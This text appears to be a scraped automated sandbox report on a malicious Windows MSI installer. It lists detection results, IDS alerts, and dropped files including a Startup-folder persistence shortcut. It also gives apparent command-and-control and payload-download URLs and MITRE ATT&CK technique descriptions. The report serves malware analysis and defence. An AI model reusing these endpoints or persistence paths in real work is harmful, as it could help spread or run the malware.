Source: C:\Users\user\garurumon.bz2	ReversingLabs: Detection: 30%
Source: C:\Users\user\msedge_elf.dll (copy)	ReversingLabs: Detection: 30%

Source: Traffic	Snort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.2.3:49698 -> 54.205.202.31:80
Source: Traffic	Snort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.2.3:49698 -> 54.205.202.31:80

Source: shi4601.tmp.2.dr	String found in binary or memory: http://.css
Source: shi4601.tmp.2.dr	String found in binary or memory: http://.jpg
Source: LtfQdc.exe, 00000012.00000002.517367234.0000000007898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.517336158.000000000788C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138.85
Source: LtfQdc.exe, 00000012.00000002.516138475.000000000763A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138.85/megazord2023/index.php
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://collect.installeranalytics.com
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: shi4601.tmp.2.dr	String found in binary or memory: http://html4/loose.dtd
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.516138475.000000000763A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LtfQdc.exe, 00000012.00000002.520729168.000000006B75C000.00000020.00000001.01000000.00000006.sdmp, garurumon.bz2.2.dr	String found in binary or memory: http://stackoverflow.com/q/11564914;
Source: LtfQdc.exe, 00000012.00000002.520729168.000000006B75C000.00000020.00000001.01000000.00000006.sdmp, garurumon.bz2.2.dr	String found in binary or memory: http://stackoverflow.com/q/2152978/23354
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: shi4601.tmp.2.dr	String found in binary or memory: https://HTTP/1.1
Source: LtfQdc.exe, 00000012.00000002.517399028.00000000078A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.L
Source: LtfQdc.exe, 00000012.00000002.517399028.00000000078A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo
Source: LtfQdc.exe, 00000012.00000002.513667683.0000000007547000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo/
Source: LtfQdc.exe, 00000012.00000002.513667683.0000000007547000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo4
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://collect.installeranalytics.com
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: msiexec.exe	String found in binary or memory: https://mzrdmodlonnce.s3.amazonaws.com/digivolve.msi
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AOEI-LEHOLLZCZW.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\6f14c6.rbs

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\8.2.1.5\tracking.ini

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\8.2.1.5\{6870A11F-75C9-4B73-AA83-CD80429460DF}.session

C:\Users\user\AppData\Local\Temp\shi4601.tmp

C:\Users\user\AppData\Local\Temp\shi472B.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtfQdc.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini

C:\Users\user\LtfQdc.exe (copy)

C:\Users\user\LtfQdc.zip

C:\Users\user\digimn.bz2

C:\Users\user\garurumon.bz2

C:\Users\user\msedge_elf.dll (copy)

C:\Windows\Installer\6f14c4.msi

C:\Windows\Installer\6f14c7.msi

C:\Windows\Installer\MSI5548.tmp

C:\Windows\Installer\MSI57F8.tmp

C:\Windows\Installer\MSI58C4.tmp

C:\Windows\Installer\MSI5962.tmp

Windows Analysis Report
AOEI-LEHOLLZCZW.msi

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre